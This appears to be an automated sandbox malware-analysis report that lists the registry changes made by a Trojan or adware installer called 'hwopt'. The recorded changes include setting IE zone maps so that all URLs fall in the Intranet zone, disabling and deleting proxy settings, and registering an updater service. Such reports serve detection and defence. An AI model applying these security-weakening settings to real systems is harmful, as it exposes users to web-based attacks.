[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"HelpLink" = "http://genisys.online"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-U38O7.tmp]
"fileman.exe" = "fileman"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\hwopt_12052016001648]
"InstallUtil.exe" = ".NET Framework installation utility"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"MinorVersion" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C CF FC 37 BB 97 83 33 92 21 38 9F B3 E1 79 41"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"Inno Setup: Language" = "english"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{29007E8C-251B-4F61-A70E-635956418637734794}_is1]
"URLUpdateInfo" = "http://genisys.online"
"DisplayName" = "hwopt 3.0.10"
"Inno Setup: Setup Version" = "5.5.5 (a)"
"Inno Setup: App Path" = "C:\Windows\hwopt_12052016001648"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process MSIF2.tmp:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 C2 FD 5A 70 39 17 49 81 4A 27 63 DF D1 78 B5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Call 2 Customer LLC\YouTube Downloader]
"YouTubeManager.exe" = "YouTubeManager"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process netsh.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF D6 36 A2 C8 AE D8 5E E2 A0 73 28 5D CC B5 A4"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process netsh.exe:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 4D BC E1 03 E4 7F 62 53 7A 4B 7C 3E 11 6B 85"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
The process InstallUtil.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 EB 62 C2 14 C6 CE D3 83 EA EB 7F F2 0C 05 D7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\hwopt12052016001648]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider, Microsoft (R) Visual C# 2005 Compiler, LoadPerf, JavaQuick&"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallUtil.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 EB 1C CA 60 F2 F5 EA 3D 0B E7 9D 6D E1 B7 8E"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\hwopt12052016001648_updater_service]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider, Microsoft (R) Visual C# 2005 Compile'"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process clicker.exe:2312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 91 5A 54 71 0D B5 48 B1 D8 4B 43 1D 9D B0 AE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process clicker.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 60 3D 16 B8 9A 13 85 41 83 7C B0 94 42 FD B6"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE]
"(Default)"
The process sc.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD AB 3C 30 DE C0 5C 58 8C 18 47 13 B9 E6 46 56"
The process sc.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 54 C9 DA 61 BF 84 13 8A CB 8A 38 B0 01 4C E8"
The process sc.exe:2000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 7C F8 77 E5 44 32 42 9B 9A 19 FC B7 F9 0E 9C"
The process sc.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8D 69 2F 76 1D AC B9 25 4B 9F 92 31 38 A0 6B"
The process sc.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 F0 4A EA EA 50 F6 55 48 7A E4 C6 20 D1 DD B4"
The process sc.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 77 D5 B5 17 60 81 DC C4 93 9C EB ED 46 4C 2A"
The process WindowsXP-KB968930-x86-ENG.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 AE 65 38 07 6A 3F 2A 99 64 0F 37 8D 48 A2 D5"
The process master.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 DC 1C E4 9D 82 D0 D7 13 D1 7D E9 BC F1 E1 BE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process hwopt12052016001648_updater_service.exe:380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 8C 7D FE BA 0D E1 14 04 09 55 6E 2F 87 83 05"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[AUTOMATIC_UPDATE_MODULE]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "Service1, NetworkAnalyser[ADWARE_ROI], NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER], NetworkAnalyser[APP_SETTINGS], hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:4020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 18 F6 3A C4 4E 70 EB B1 99 4C 05 FB 13 45 79"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 1F F6 AD 96 01 CB 18 7A 14 A3 28 23 1F C3 C3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 81 59 49 5F 0C 8F 69 B5 03 1A FC 4B 08 AF 04"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"
